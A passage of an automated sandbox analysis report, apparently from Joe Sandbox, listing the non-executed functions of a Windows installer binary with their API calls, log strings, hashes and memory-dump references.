                                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                                                                        Non-executed Functions

                                                                                        Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                                        • API String ID: 2110491804-2409696222
                                                                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                        Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $ @$M$N
                                                                                        • API String ID: 1638840714-3479655940
                                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                        Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                        • String ID: 82D$@%F$@rD$A
                                                                                        • API String ID: 3347642858-1086125096
                                                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                        Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                        • API String ID: 1916479912-1189179171
                                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                        Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                                        Strings
                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                        • \*.*, xrefs: 00406D03
                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                        • API String ID: 2035342205-3294556389
                                                                                        • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                        • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                        Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 3581403547-784952888
                                                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                        Strings
                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance
                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                        • API String ID: 542301482-1377821865
                                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                        Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                        • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                        Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                        • API String ID: 20674999-2124804629
                                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
